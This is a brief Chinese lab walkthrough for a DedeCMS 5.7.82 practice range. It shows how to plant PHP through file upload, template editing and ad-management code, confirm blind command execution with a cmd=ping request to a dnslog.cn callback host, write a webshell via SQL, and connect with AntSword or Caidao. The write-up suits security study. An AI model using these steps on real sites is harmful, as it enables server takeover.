DeDeCMS靶场攻略

文件管理器

点击模块,选择上传文件

在电脑中新建2.php

<?php phpinfo();?>

访问2.php,验证是否成功

修改模板文件

在模块中找到index.htm

在index.htm加上<?php phpinfo();?>

点击生成->更新主页HTML,将index.html改为index.php

访问index.php,验证是否成功

后台任意命令执行

点击广告管理->增加广告

<?php phpinfo();?>

点击[代码]

得到地址

访问地址,无回显

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1

在dnslog.cn上获得一个网址

再次访问,这样若成功将木马植入的话dnslog会显示访问记录

http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn

后台sql命令执行

尝试查询basedir

在得到的目录下写入木马文件

访问后得到12.php

这些成功后可以用蚁剑,caidao连接

相关推荐
用户745890020795426 分钟前
线程池
android
专注前端30年35 分钟前
【PHP开发与安全防护实战】性能调优手册
android·安全·php
王正南2 小时前
安卓逆向之LSposed开发(一)
android·xposed·lsposed
YIN_尹3 小时前
【MySQL】数据类型(上)
android·mysql·adb
robotx5 小时前
AOSP设备节点权限添加相关
android
顾林海5 小时前
Android文件系统安全与权限控制:给应用数据上把“安全锁”
android·面试·操作系统
青莲8435 小时前
Android 动画机制完整详解
android·前端·面试
城东米粉儿5 小时前
android 离屏预渲染 笔记
android
未知名Android用户5 小时前
Android自定义 View + Canvas—声纹小球动画
android
_李小白5 小时前
【Android FrameWork】延伸阅读:AMS 的 handleApplicationCrash
android·开发语言·python